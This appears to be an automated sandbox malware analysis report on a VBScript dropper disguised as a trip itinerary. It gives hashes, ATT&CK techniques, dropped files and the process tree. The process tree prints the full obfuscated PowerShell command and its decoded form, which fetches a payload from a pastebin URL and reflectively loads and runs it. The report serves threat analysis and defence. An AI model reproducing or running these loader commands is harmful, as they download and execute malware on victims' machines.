b73dbf4a79bb87a8294bf87271ec249ed831ec72e6e194c3636f78858dcd3ab1

General

Target

Trip Itinerary detail.vbs
Size

245KB
MD5

e011adb4a7b7e60d89697fd6060a5b83
SHA1

6a7c2953cffe72cb5178d800be718bbadcf7f14b
SHA256

b73dbf4a79bb87a8294bf87271ec249ed831ec72e6e194c3636f78858dcd3ab1
SHA512

c6adbaf622441058d018258adbb2d1cda5b390c80234ea66b1fe9fd149b5adf28f7a8575d6159d25073fde93f712a86831968cf0a0ed710c495581042c275d00
SSDEEP

3072:iC99Sy99y999999999996999999999999N9999SoV969ZA:Z

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/PUgmUTiH

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1280	powershell.exe
6	1280	powershell.exe
8	1280	powershell.exe
10	1280	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1964	powershell.exe
1280	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	1280	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1368 wrote to memory of 1964	1368	WScript.exe	27
PID 1368 wrote to memory of 1964	1368	WScript.exe	27
PID 1368 wrote to memory of 1964	1368	WScript.exe	27
PID 1964 wrote to memory of 1280	1964	powershell.exe	29
PID 1964 wrote to memory of 1280	1964	powershell.exe	29
PID 1964 wrote to memory of 1280	1964	powershell.exe	29

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HY‱d‱B0‱H‱‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB6‱Hg‱YgBq‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱b‱Bq‱Hk‱ZwB2‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱F‱‱VQBn‱G0‱VQBU‱Gk‱S‱‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱b‱Bq‱Hk‱ZwB2‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBW‱Es‱UgBl‱EI‱UwBT‱GY‱bQ‱y‱Ew‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱egB4‱GI‱ag‱g‱Cw‱I‱‱n‱E8‱YQBN‱Fk‱Qw‱n‱Cw‱I‱‱k‱HI‱dgB0‱HQ‱c‱‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs');powershell -command $KByHL;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rvttp = '01234';$mzxbj = 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs';[Byte[]] $ljygv = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PUgmUTiH') ) );[system.AppDomain]::CurrentDomain.Load($ljygv).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('VKReBSSfm2Lx/daolnwod/moc.oietsap//:sptth' , $mzxbj , 'OaMYC', $rvttp, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1280

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
78909577835f0450fab2956b435f413c

SHA1
9fe0406e196a0c29793ba234f8d8fe795c56c596

SHA256
720b36895f84063b5c53f8543af5dab242eb91521670241d4e1b5792e3011f21

SHA512
e5a0da720603396dd003e1aaeb47ef10c06438538a4110457a2b1e3579259d85681d22bf72fbd4f812b975505d78a5ba788f216d0af5a27a56b86d7ee9b29f8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab567C.tmp

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar57CB.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0ac8a7501fa638e4e0f72911acc13942

SHA1
caed98a282f34a41566a7e805d930cc2eaa43fd9

SHA256
30f2325e5a39c5a3127c852a7e042388f01c1ffe1465c5e1fb98e5afc2ccfa9d

SHA512
e5ef2dd86a8c3c6371301069daad1b4f467696d179c8238e19d525b0655f9232e56b77fe8a0b76d3f82a31fb6da8dd5737d433430e8c089c0d25893f18d69d3a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZDIF9ZZ18PYISTJ7KTTO.temp

Filesize
7KB

MD5
0ac8a7501fa638e4e0f72911acc13942

SHA1
caed98a282f34a41566a7e805d930cc2eaa43fd9

SHA256
30f2325e5a39c5a3127c852a7e042388f01c1ffe1465c5e1fb98e5afc2ccfa9d

SHA512
e5ef2dd86a8c3c6371301069daad1b4f467696d179c8238e19d525b0655f9232e56b77fe8a0b76d3f82a31fb6da8dd5737d433430e8c089c0d25893f18d69d3a

Download Submit
memory/1280-68-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/1280-69-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/1280-136-0x00000000029B0000-0x00000000029BA000-memory.dmp

Filesize
40KB

Download
memory/1964-58-0x000000001B280000-0x000000001B562000-memory.dmp

Filesize
2.9MB

Download
memory/1964-62-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/1964-61-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/1964-60-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/1964-59-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing